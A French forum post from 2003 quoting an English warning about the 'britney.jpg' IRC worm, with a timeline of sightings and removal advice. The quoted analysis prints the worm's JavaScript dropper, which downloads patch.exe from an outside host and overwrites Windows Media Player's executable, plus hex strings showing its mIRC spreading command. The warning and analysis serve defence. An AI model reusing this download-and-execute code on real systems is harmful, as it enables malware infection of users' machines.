View Single Post
  #2  
Old 27-10-2003, 13:40
Cougar's Avatar
Cougar Cougar is offline
Membre senior
 
Join Date: 16-09-2001
Location: Orléans
Age: 41
Posts: 3,850
Send a message via MSN to Cougar
Re: Ne jouez pas avec Britney

ben le lien http://charmy.tky.hut.fi/brit.txt ne contient aucun virus/ver/...

Aussi bien benjy, formatman et moi n'avons eu aucun problèmes en allant sur ce lien.

voilà ce qu'il contient :
Quote:
2003-10-26 15:15 (+0200)DO NOT CLICK ON britney.jpg!!!Under no circumstances open an URL that ends with britney.jpg. It is actuallyan Internet Explorer / Windows Media Player exploit, as shown below.-----var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";-----patch.exe seems to be compressed with UPX, interesting strings can be found within.0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!This is a command it sends automatically to mIRC. This causes mIRC to send theexploit URL to all channels you are in.It will replace/delete Windows system files. If that happens, you might get amessage of this sort: "Files that are required for Windows to run properly havebeen replaced by unrecognized versions".This is NOT the same thing as http://koti.phnet.fi/jonninen/mircwo...tny.txt.15:30: At this time I don't know if the worm can be removed. If it manages to deleteyour Windows system files, you'll have to reinstall Windows.15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit theyare hosting.16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) inEFnet.According to reports, simply "repairing" the Windows install or copying the deletedfiles back isn't enough, since the virus also messes around with the Windows registry.You'll have to reinstall Windows.16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. 16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.17:00: There's a list of Windows system files in the uncompressed version of patch.exestarting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,userinit.exe, services.exe, etc. There are also references to some anti-virus andfirewall programs in the immediate vicinity. The virus probably disables theseprograms so that it can roam freely.Reports say that the virus does not affect Windows 98, but it definitely affectsat least Windows 2000 and XP. Anti-virus software does not help you at this point,since none of them recognize the virus yet.The scavenger.sharewith.us site has been disabled. This prevents the virus frominfecting machines for now, but the Angelfire page is still up and the author ofthe virus could modify the page to point to another location.The IE exploit: http://www.security.nnov.ru/search/d...cid=510217:30: The virus might not affect Windows Media Player version 8. (seehttp://www.kb.cert.org/vuls/id/222044)19:10: According to reports, the virus does affect WMP 8 as well. Better not openany suspicious links as long as you use IE.2003-10-26 19:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
__________________
Reply With Quote